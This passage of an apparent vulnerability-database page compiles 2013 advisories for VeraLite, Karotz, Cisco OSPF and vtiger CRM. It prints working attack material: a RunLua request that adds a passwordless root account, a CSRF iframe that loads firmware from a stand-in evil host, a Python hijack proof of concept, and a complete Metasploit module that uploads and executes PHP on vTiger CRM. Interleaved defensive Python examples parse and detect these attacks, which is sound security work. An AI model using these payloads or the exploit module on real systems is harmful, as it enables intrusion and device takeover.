X-Prototype-Version: 1.7
Content-Type: text/xml;charset=UTF-8
MIME-Version: 1.0
SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute("echo 'backdoor%3a%3a0%3a0%3aBackdoor Root Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd")</Code> </u:RunLua></s:Body></s:Envelope>
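Findings 2 and 3 above carry the same RunLua envelope. For triage of a captured request, here is an added example (Python, not part of the Trustwave advisory) that pulls the SOAPACTION and the <Code> element out of such a request, undoes the percent-encoding the capture carries, and parses any passwd entry the Lua appends so that a uid-0 account stands out. The request in the block is the advisory's payload retyped as a constructed sample against a documentation address; the function and variable names are the example's own.

```python
"""Triage helper for captured RunLua SOAP requests (added example, not
advisory code). SAMPLE_REQUEST is a constructed copy of the payload
shown above, with only the headers that matter here."""
import re
import urllib.parse
import xml.etree.ElementTree as ET

NS = {
    "s": "http://schemas.xmlsoap.org/soap/envelope/",
    "u": "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1",
}

SAMPLE_REQUEST = (
    "POST /upnp/control/hag HTTP/1.1\r\n"
    "Host: 192.0.2.10:49451\r\n"                 # documentation address, constructed
    "Content-Type: text/xml;charset=UTF-8\r\n"
    'SOAPACTION: "urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua"\r\n'
    "\r\n"
    '<s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" '
    'xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1">'
    "<DeviceNum></DeviceNum><Code>os.execute(\"echo 'backdoor%3a%3a0%3a0%3aBackdoor Root "
    "Account%3a/tmp%3a/bin/ash' %3e%3e /etc/passwd\")</Code></u:RunLua></s:Body></s:Envelope>"
)

# echo '<passwd line>' >> /etc/passwd, as the Lua above does via os.execute
PASSWD_APPEND = re.compile(r"echo\s+'([^']*)'\s*>>\s*/etc/passwd")


def parse_runlua(raw):
    """Return {'action', 'code'} for a RunLua request, else None."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        return None
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    action = headers.get("soapaction", "").strip('"').rsplit("#", 1)[-1]
    if action != "RunLua":
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    code = root.find(".//u:RunLua/Code", NS)      # <Code> carries no namespace
    if code is None or not code.text:
        return None
    # The advisory's capture carries the Lua percent-encoded (%3a, %3e);
    # decode it so the shell command reads as it would execute.
    return {"action": action, "code": urllib.parse.unquote(code.text)}


def passwd_entries_appended(code):
    """Parse passwd(5)-format lines that the Lua appends to /etc/passwd."""
    entries = []
    for m in PASSWD_APPEND.finditer(code):
        fields = m.group(1).split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue
        entries.append({
            "name": fields[0],
            "password": fields[1],    # empty field: no password required
            "uid": int(fields[2]),
            "gid": int(fields[3]),
            "home": fields[5],
            "shell": fields[6],
        })
    return entries


def is_root_backdoor(raw):
    """True when the request runs Lua that appends a uid-0 account."""
    parsed = parse_runlua(raw)
    if parsed is None:
        return False
    return any(e["uid"] == 0 for e in passwd_entries_appended(parsed["code"]))


if __name__ == "__main__":
    parsed = parse_runlua(SAMPLE_REQUEST)
    print(parsed["code"])
    print(passwd_entries_appended(parsed["code"]))
    print("root backdoor:", is_root_backdoor(SAMPLE_REQUEST))
```

On the sample, the decoded Lua is `os.execute("echo 'backdoor::0:0:Backdoor Root Account:/tmp:/bin/ash' >> /etc/passwd")`: a uid 0, gid 0 account with an empty password field and an ash shell. The same parser applies to Finding 2's request, which differs only in the /port_49451 prefix used when relayed through the web console.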
Finding 4: Server-Side Request Forgery
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4864
CWE: CWE-918
The VeraLite will make HTTP requests on behalf of a user using the
/cgi-bin/cmh/proxy.sh script. A proof of concept to pull the homepage of
trustwave.com is as follows:
GET http://A.B.C.D/cgi-bin/cmh/proxy.sh?url=https://www.trustwave.com
This allows an attacker to bypass firewall controls, use the VeraLite as a proxy
Finding 5: Cross-Site Request Forgery
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4865
CWE: CWE-352
The VeraLite does not implement any defense against cross-site request
forgery. A proof of concept as seen below can cause a Vera user to update
their firmware using a custom firmware URL:
<html>
<body>
<iframe src="http://A.B.C.D/upgrade_step2.sh?squashfs=http://example.com/evil_vera_firmware.squashfs" width="1" height="1">
</iframe>
</body>
</html>
If this PoC was embedded in any web page a targeted user visited, an
attacker would be able to make arbitrary changes to the firmware on the
device, allowing the potential for remote root access.
Vendor Response:
"...the "vulnerabilities" you referred to were deliberate design decisions
because that's what the customers in this particular channel (ie Vera
retail) want. As you can see we have an open forum to discuss this, and
very people object to leaving Vera open. So we are not able to lock down
the gateway, and effectively break the systems of many customers who rely
on the open system to run their own scripts and plugins."
Remediation Steps:
No official patch is available. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of access control lists and proper
network segmentation.
Revision History:
04/23/13 - Vulnerability disclosed to vendor
06/04/13 - Vendor confirms they will not fix
08/01/13 - Advisory published
References
1. http://www.micasaverde.com/
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
________________________________
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format
| VAR-201912-1594 | CVE-2013-4868 | Violet Karotz API Session Token Information Disclosure Vulnerability |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
The Karotz API contains an information disclosure vulnerability; information may be obtained. Violet Karotz is a device marketed as a wireless smart rabbit. External Karotz applications control the device through the API at api.karotz.com over plaintext HTTP, so the session token returned by the API's session-validation call, which is required to control the Karotz, can be eavesdropped by an attacker on the network path. With that token the attacker can issue arbitrary remote API calls, for instance using the camera and sending captured video to any server. Violet Karotz is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to obtain potentially sensitive information.
Violet Karotz 12.07.19.00 is vulnerable; other versions may also be affected. Trustwave SpiderLabs Security Advisory TWSL2013-021:
Multiple Vulnerabilities in Karotz Smart Rabbit
Published: 08/01/13
Version: 1.0
Vendor: Electronic Arts (http://www.ea.com/), formerly Mindscape, formerly Violet
Product: Karotz
Version affected: 12.07.19.00
Product description:
Karotz is the successor to the "Nabaztag". Nabaztag is a Wi-Fi enabled
ambient electronic device in the shape of a rabbit, invented by Rafi
Haladjian and Olivier Mével, and manufactured by the company Violet.[1]
Nabaztag was designed to be a "smart object" comparable to those
manufactured by Ambient Devices; it can connect to the Internet (to
download weather forecasts, read its owner's email, etc.). It is also
customizable and programmable to an extent.
Finding 1: Python Module Hijacking
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4867
CWE: CWE-427
During the setup process for a Karotz unit, if wifi is selected as the
method used to connect to the Internet, a python script named "autorunwifi"
is run as root to set up the wifi connectivity. This file, along with
several others, is placed in the root of a USB flash drive or hard drive.
Another file, named "autorunwifi.sig", contains a signature of autorunwifi
signed with the private key for Violet, to prevent modifications to the
"autorunwifi" script.
Since Python first attempts to load modules not built into Python from the
same directory as the invoked script, it is possible to override the
functionality of imported modules by placing a file with the same basename
as the module being imported and an extension of ".py". In this case, it is
possible to write a Python script named "simplejson.py" and place it in the
same directory as the other setup files, which will cause the contents of
simplejson.py to be executed at the beginning of the "autorunwifi" script
execution.
This attack requires a USB flash drive to be plugged into the Karotz unit,
and requires the Karotz to be turned off and on.
The following is a proof of concept "simplejson.py" file that will copy the
pubring.gpg file from the Karotz onto the inserted USB key, which is
processed with MD5 to produce the key used to decrypt the root filesystem
for the Karotz:
## simplejson.py
import os
os.system("cp /karotz/etc/gpg/pubring.gpg /mnt/usbkey")
## end simplejson.py
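To see the import-order behaviour the finding relies on, and the check a loader could make before trusting a signed script, here is an added example (Python; not Karotz code). It builds a throwaway directory holding a victim script that imports the standard-library json module, drops a json.py beside it, and runs the script once normally and once under the interpreter's isolated mode (-I), which keeps the script's directory off sys.path. json stands in for simplejson, which is not installed by default; the file names and helper names are the example's own.

```python
"""Python module hijacking (CWE-427) reproduced in a temp directory, plus
the sibling-file check a signature-verifying loader could run first.
Added example for this page; autorunwifi.py and json.py here are stand-ins
for the advisory's autorunwifi and simplejson.py, not the real files."""
import os
import subprocess
import sys
import tempfile
import textwrap

# The "signed" script. Its import of json is resolved through sys.path,
# whose first entry is the script's own directory unless told otherwise.
VICTIM = textwrap.dedent("""\
    import json
    print("hijacked" if hasattr(json, "MARKER") else "stdlib")
""")

# The unsigned file dropped next to it, named after the imported module.
# Its body runs at import time, as root if the victim runs as root.
HIJACK = "MARKER = True\n"


def make_usb_tree(root):
    """Write the victim script and the shadowing module; return script path."""
    script = os.path.join(root, "autorunwifi.py")
    with open(script, "w") as f:
        f.write(VICTIM)
    with open(os.path.join(root, "json.py"), "w") as f:
        f.write(HIJACK)
    return script


def shadowed_modules(script_dir, imports):
    """Names in `imports` that a file in script_dir would shadow.

    A loader that verifies only the script's signature should refuse to
    run when this list is non-empty: those files are outside the signature
    yet are exactly what Python will import first."""
    hits = []
    for name in imports:
        if (os.path.isfile(os.path.join(script_dir, name + ".py"))
                or os.path.isfile(os.path.join(script_dir, name, "__init__.py"))):
            hits.append(name)
    return hits


def run_victim(script, isolated):
    """Run the script in a child interpreter; return 'hijacked' or 'stdlib'."""
    cmd = [sys.executable] + (["-I"] if isolated else []) + [script]
    proc = subprocess.run(cmd, capture_output=True, text=True, check=True)
    return proc.stdout.strip()


def demo():
    """Exercise the hijack and the two mitigations; return the results."""
    with tempfile.TemporaryDirectory() as usb:
        script = make_usb_tree(usb)
        return {
            "shadowed": shadowed_modules(usb, ["json", "sys"]),  # sys is built in
            "default": run_victim(script, isolated=False),
            "isolated": run_victim(script, isolated=True),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:9} {value!r}")
```

shadowed_modules() is the check a loader that verifies autorunwifi.sig could run over the script's directory before executing it: the signature covers the script but not the files next to it, and any sibling file named after an import is the file Python loads first. Running the script with -I (or, from Python 3.11, -P / PYTHONSAFEPATH) removes the script directory from sys.path; that closes this particular path but leaves any other writable directory on sys.path to be checked in the same way.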
Finding 2: API Session Token Passed in Cleartext
*****Credit: Daniel Crowley of Trustwave SpiderLabs
CVE: CVE-2013-4868
There are two kinds of applications for the Karotz: hosted and external.
Hosted applications are stored and run on the Karotz itself. External
applications run outside the Karotz unit and control the Karotz through an
api at api.karotz.com. Both types of applications must specifically request
to use parts of the karotz in the manifest file of their application
package. For instance, if your application uses the webcam and ears, you
must specify in your application manifest that these will be used by your
application before they will be available to your application.
The control is performed over plaintext HTTP, so the session token an
external application presents to the API can be captured by anyone on the
network path and replayed to issue API calls with that application's
permissions. For instance, if the application has requested the webcam, a
video could be captured with it and sent to an arbitrary server.
Vendor Response:
No response received.
Remediation Steps:
No official patch is available. To limit exposure,
network access to these devices should be limited to authorized
personnel through the use of Access Control Lists and proper
network segmentation.
Revision History:
06/19/13 - Attempt to contact vendor
07/10/13 - Attempt to contact vendor
07/12/13 - Attempt to contact vendor
08/01/13 - Advisory published
Additional Credits:
Discussion of Python module loading behavior and initial suggestion of
application to Karotz by Jennifer Savage
References
1. http://www.karotz.com
2. http://savagejen.github.io/blog/2013/04/28/python-module-hijacking/
| VAR-201308-0052 | CVE-2013-0149 | Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers |
CVSS V2: 5.8 CVSS V3: - Severity: MEDIUM |
The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795. The underlying issue is how the OSPF protocol specification identifies LSAs. Each LSA carries an LS Type, an Advertising Router and a Link State ID, and for a router-LSA the specification requires the Link State ID and the Advertising Router to be set to the same value. Receiving a crafted router-LSA in which these two values differ may alter the contents of the routing table. The exact impact varies by product and implementation: an attacker may be able to cause a denial of service (DoS) or redirect network traffic to another router. OSPF is a routing protocol defined by RFC 2328 for managing IP routes within an AS; OSPF packets use IP protocol number 89. The vulnerability lies in the handling of the OSPF LSA database, and several Cisco products are affected. It allows an unauthenticated attacker to take full control of the routing table of the OSPF AS, black-hole traffic, and intercept communications, which can lead to denial of service. An attacker triggers the vulnerability by injecting a specially crafted OSPF packet. Successful exploitation can wipe the routing table on the target router and propagate the crafted OSPF LSA type 1 update throughout the OSPF AS.
To exploit this vulnerability, an attacker must accurately determine certain parameters in the LSA data on the target router. The vulnerability can only be triggered by a specially crafted unicast or multicast LSA type 1 message; other LSA types cannot trigger it. OSPFv3 and Fabric Shortest Path First (FSPF) are not affected. This may aid in further attacks. IOS, IOS-XE, and NX-OS are operating systems Cisco develops for its network devices; ASA and FWSM are firewall products. The following products and versions are affected: Cisco IOS Releases 12.0 to 12.4 and 15.0 to 15.3, IOS-XE Releases 2.x to 3.9.xS, ASA and PIX Releases 7.x to 9.1, FWSM, NX-OS, and StarOS versions prior to 14.0.50488.
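An added illustration (Python, not Cisco's code) of the identifier check described above: it parses the 20-byte OSPFv2 LSA header from RFC 2328, rejects a router-LSA whose Link State ID and Advertising Router disagree, and keys the LSA database on the full (LS type, Link State ID, Advertising Router) triple so that a crafted LSA cannot displace another router's entry. The two sample LSAs are constructed; checksums are left at zero and nothing else about a real OSPF receive path (packet authentication, flooding, sequence-number and age handling) is modelled.

```python
"""Router-LSA identifier validation and LSDB keying (added example for
this page, not vendor code). Header layout follows RFC 2328 A.4.1; the
sample headers built below are constructed, with checksum left at zero."""
import ipaddress
import struct

# LS age, Options, LS type, Link State ID, Advertising Router,
# LS sequence number, LS checksum, length  (20 bytes, network order)
LSA_HEADER = struct.Struct("!HBBIIIHH")
ROUTER_LSA = 1


def build_lsa_header(ls_type, link_state_id, advertising_router,
                     seq=0x80000001, length=LSA_HEADER.size):
    """Pack a header for the constructed samples."""
    return LSA_HEADER.pack(0, 0x02, ls_type,
                           int(ipaddress.IPv4Address(link_state_id)),
                           int(ipaddress.IPv4Address(advertising_router)),
                           seq, 0, length)


def parse_lsa_header(data):
    """Decode the fixed LSA header at the start of `data`."""
    if len(data) < LSA_HEADER.size:
        raise ValueError("short LSA header")
    age, options, ls_type, lsid, adv, seq, cksum, length = LSA_HEADER.unpack_from(data)
    return {
        "ls_age": age, "options": options, "ls_type": ls_type,
        "link_state_id": str(ipaddress.IPv4Address(lsid)),
        "advertising_router": str(ipaddress.IPv4Address(adv)),
        "ls_seq": seq, "ls_checksum": cksum, "length": length,
    }


def router_lsa_ids_consistent(hdr):
    """RFC 2328 12.1.4: a router-LSA's Link State ID is the originating
    router's Router ID, so it must equal the Advertising Router."""
    if hdr["ls_type"] != ROUTER_LSA:
        return True          # the rule is specific to router-LSAs
    return hdr["link_state_id"] == hdr["advertising_router"]


def lsdb_key(hdr):
    # An LSA is identified by all three fields. Keying on the Link State
    # ID alone is what lets a crafted LSA overwrite another router's entry.
    return (hdr["ls_type"], hdr["link_state_id"], hdr["advertising_router"])


def accept_lsa(lsdb, data):
    """Validate a received LSA and install it; return True if installed."""
    hdr = parse_lsa_header(data)
    if not router_lsa_ids_consistent(hdr):
        return False
    lsdb[lsdb_key(hdr)] = hdr
    return True


if __name__ == "__main__":
    lsdb = {}
    genuine = build_lsa_header(ROUTER_LSA, "10.0.0.1", "10.0.0.1")
    # Same Link State ID as the genuine LSA, different Advertising Router
    crafted = build_lsa_header(ROUTER_LSA, "10.0.0.1", "192.0.2.99")
    print("genuine installed:", accept_lsa(lsdb, genuine))
    print("crafted installed:", accept_lsa(lsdb, crafted))
    print("LSDB keys:", list(lsdb))
```

The crafted header reuses the genuine LSA's Link State ID with a different Advertising Router; an implementation that looks the entry up by Link State ID alone would replace the genuine LSA with it, while the check here discards it before it touches the database.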
| VAR-201308-0138 | CVE-2013-1190 | Cisco Unified Computing System of C-Series Rack Server Service disruption in components (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The C-Series Rack Server component 1.4 in Cisco Unified Computing System (UCS) does not properly restrict inbound access to ports, which allows remote attackers to cause a denial of service (Integrated Management Controller reboot or hang) via crafted packets, as demonstrated by nmap, aka Bug ID CSCtx19850. Cisco Unified Computing System is prone to a remote denial-of-service vulnerability.
An attacker can exploit this issue to cause an affected device to reload, denying service to legitimate users.
This issue is tracked by Cisco Bug ID CSCtx19850. The system integrates network, computing and virtualization resources into one platform by extensively adopting virtualization technology
| VAR-201308-0092 | CVE-2013-3448 | Cisco WebEx Meetings Server Vulnerable to access restrictions |
CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
Cisco WebEx Meetings Server does not check whether a user account is active, which allows remote authenticated users to bypass intended access restrictions by performing meeting operations after account deactivation, aka Bug ID CSCuh33315. Cisco WebEx is a web conferencing solution.
An attacker can exploit this issue to bypass the authentication mechanism and gain unauthorized access to vulnerable application. This may lead to further attacks.
This issue is tracked by Cisco Bug ID CSCuh33315. Cisco WebEx Meetings Server (CWMS) is a set of multi-functional conference solutions including audio, video and Web conference in Cisco's WebEx conference solution
| VAR-202001-0885 | CVE-2013-3212 |
vtiger CRM Vulnerability in injection
Related entries in the VARIoT exploits database: VAR-E-201308-0074 |
CVSS V2: 6.8 CVSS V3: 8.1 Severity: HIGH |
vtiger CRM 5.4.0 and earlier contain local file-include vulnerabilities in 'customerportal.php' which allow remote attackers to view files and execute local script code. vtiger CRM contains an injection vulnerability; information may be obtained or falsified, or a denial of service (DoS) caused. vtiger CRM is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. This may allow the attacker to compromise the application; other attacks are also possible.
vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM, developed by the American company Vtiger. It provides functions such as management, collection and analysis of customer information. The vulnerability arises because the program does not properly filter user-submitted input.
---------------------------------------------------------------------------------
vtiger CRM <= 5.4.0 (customerportal.php) Two Local File Inclusion Vulnerabilities
---------------------------------------------------------------------------------
[-] Software Link:
http://www.vtiger.com/
[-] Affected Versions:
[1] All versions from 5.1.0 to 5.4.0.
[2] All versions from 5.2.0 to 5.4.0.
[-] Vulnerability Description:
1) The vulnerable code is located in the get_list_values SOAP method defined in /soap/customerportal.php:
1528. function get_list_values($id,$module,$sessionid,$only_mine='true')
1529. {
1530. require_once('modules/'.$module.'/'.$module.'.php');
1531. require_once('include/utils/UserInfoUtil.php');
1532. global $adb,$log,$current_user;
1533. $log->debug("Entering customer portal function get_list_values");
2) The vulnerable code is located in the get_project_components SOAP method defined in /soap/customerportal.php:
2778. function get_project_components($id,$module,$customerid,$sessionid) {
2779. require_once("modules/$module/$module.php");
2780. require_once('include/utils/UserInfoUtil.php');
2781.
2782. global $adb,$log;
2783. $log->debug("Entering customer portal function get_project_components ..");
The vulnerabilities exist because these methods fail to properly validate input passed through the "module"
parameter, which is used in a call to the require_once() function (lines 1530 and 2779). This can be
exploited to include arbitrary local files containing malicious PHP code. Successful exploitation of these
vulnerabilities requires the application to be running on PHP < 5.3.4, because a null byte injection is required
to cut off the "/$module.php" suffix.
[-] Solution:
Apply the vendor patch: http://www.vtiger.com/blogs/?p=1467
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked for feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-3212 to these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-05
| VAR-202001-0887 | CVE-2013-3215 |
vtiger CRM Vulnerabilities in authentication
Related entries in the VARIoT exploits database: VAR-E-201308-0074, VAR-E-201308-0073 |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
vtiger CRM 5.4.0 and earlier contain an authentication bypass vulnerability due to improper authentication validation in the validateSession function. vtiger CRM contains an authentication vulnerability; information may be obtained or falsified, or a denial of service (DoS) caused. vtiger CRM is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks.
vtiger CRM 5.4.0 and prior are vulnerable. Vtiger CRM is a customer relationship management system (CRM) based on SugarCRM, developed by the American company Vtiger. It provides functions such as management, collection and analysis of customer information.
[-] Vulnerability Description:
The vulnerable code is located in the validateSession() function, which is defined in multiple SOAP services:
function validateSession($username, $sessionid)
{
global $adb,$current_user;
$adb->println("Inside function validateSession($username, $sessionid)");
require_once("modules/Users/Users.php");
$seed_user = new Users();
$id = $seed_user->retrieve_user_id($username);
$server_sessionid = getServerSessionId($id);
$adb->println("Checking Server session id and customer input session id ==> $server_sessionid == $sessionid");
if($server_sessionid == $sessionid)
{
$adb->println("Session id match. Authenticated to do the current operation.");
return true;
}
else
{
$adb->println("Session id does not match. Not authenticated to do the current operation.");
return false;
}
}
The vulnerability exists because the "sessionid" parameter isn't properly validated before being
compared with the $server_sessionid variable, which is the value returned by the getServerSessionId()
function. If getServerSessionId() is called with an ID that has no session (for example the ID looked up
for a non-existent username), it returns null, and the loose == comparison then makes validateSession()
return true whenever the "sessionid" parameter is 0, false, or null. This can be done by calling a SOAP
method without providing the "username" and "sessionid" parameters.
[-] Solution:
Apply the vendor patch: http://www.vtiger.com/blogs/?p=1467
[-] Disclosure Timeline:
[13/01/2013] - Vendor notified
[06/02/2013] - Vendor asked for feedback about http://trac.vtiger.com/cgi-bin/trac.cgi/changeset/13848
[05/03/2013] - Feedback provided to the vendor
[26/03/2013] - Vendor patch released
[18/04/2013] - CVE number requested
[20/04/2013] - CVE number assigned
[01/08/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-3215 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-08
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rexml/document'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include REXML
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
'Description' => %q{
vTiger CRM allows an user to bypass authentication when requesting SOAP services.
In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
service. By combining both vulnerabilities an attacker can upload and execute PHP
code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
10.04 and Windows 2003 SP2.
},
'Author' =>
[
'Egidio Romano', # Vulnerability discovery
'juan vazquez' # msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-3214' ],
[ 'CVE', '2013-3215' ],
[ 'OSVDB', '95902' ],
[ 'OSVDB', '95903' ],
[ 'BID', '61558' ],
[ 'BID', '61559' ],
[ 'EDB', '27279' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
# Arbitrary big number. The payload is sent base64 encoded
# into a POST SOAP request
'Space' => 262144, # 256k
'DisableNops' => true
},
'Targets' =>
[
[ 'vTigerCRM v5.4.0', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 26 2013'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
], self.class)
end
def check
test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
res = send_soap_request(test_one)
unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
return Exploit::CheckCode::Unknown
end
test_two = check_email_soap("admin")
res = send_soap_request(test_two)
if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
file_name = rand_text_alpha(rand(10)+6) + '.php'
php = %Q|<?php #{payload.encoded} ?>|
soap = add_attachment_soap(file_name, php)
res = send_soap_request(soap)
print_status("#{peer} - Uploading payload...")
if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
print_good("#{peer} - Upload successfully uploaded")
register_files_for_cleanup(file_name)
else
fail_with(Failure::Unknown, "#{peer} - Upload failed")
end
print_status("#{peer} - Executing payload...")
send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
end
def add_attachment_soap(file_name, file_data)
xml = Document.new
xml.add_element(
"soapenv:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
'xmlns:crm' => "http://www.vtiger.com/products/crm"
})
xml.root.add_element("soapenv:Header")
xml.root.add_element("soapenv:Body")
body = xml.root.elements[2]
body.add_element(
"crm:AddEmailAttachment",
{
'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
})
crm = body.elements[1]
crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
crm.add_element("filename", {'xsi:type' => 'xsd:string'})
crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
crm.add_element("username", {'xsi:type' => 'xsd:string'})
crm.add_element("session", {'xsi:type' => 'xsd:string'})
crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
crm.elements['filedata'].text = "MSF_PAYLOAD"
crm.elements['filename'].text = "MSF_FILENAME"
crm.elements['filesize'].text = file_data.length.to_s
crm.elements['filetype'].text = "php"
crm.elements['username'].text = rand_text_alpha(4+rand(4))
xml_string = xml.to_s
xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")
return xml_string
end
def check_email_soap(user_name = "", session = "")
xml = Document.new
xml.add_element(
"soapenv:Envelope",
{
'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",
'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",
'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
'xmlns:crm' => "http://www.vtiger.com/products/crm"
})
xml.root.add_element("soapenv:Header")
xml.root.add_element("soapenv:Body")
body = xml.root.elements[2]
body.add_element(
"crm:CheckEmailPermission",
{
'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
})
crm = body.elements[1]
crm.add_element("username", {'xsi:type' => 'xsd:string'})
crm.add_element("session", {'xsi:type' => 'xsd:string'})
crm.elements['username'].text = user_name
crm.elements['session'].text = session
xml.to_s
end
def send_soap_request(soap_data)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => soap_data
})
return res
end
end
| VAR-202001-1150 | CVE-2013-4864 |
Mi Casa Verde VeraLite Security Bypass Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201308-0135 |
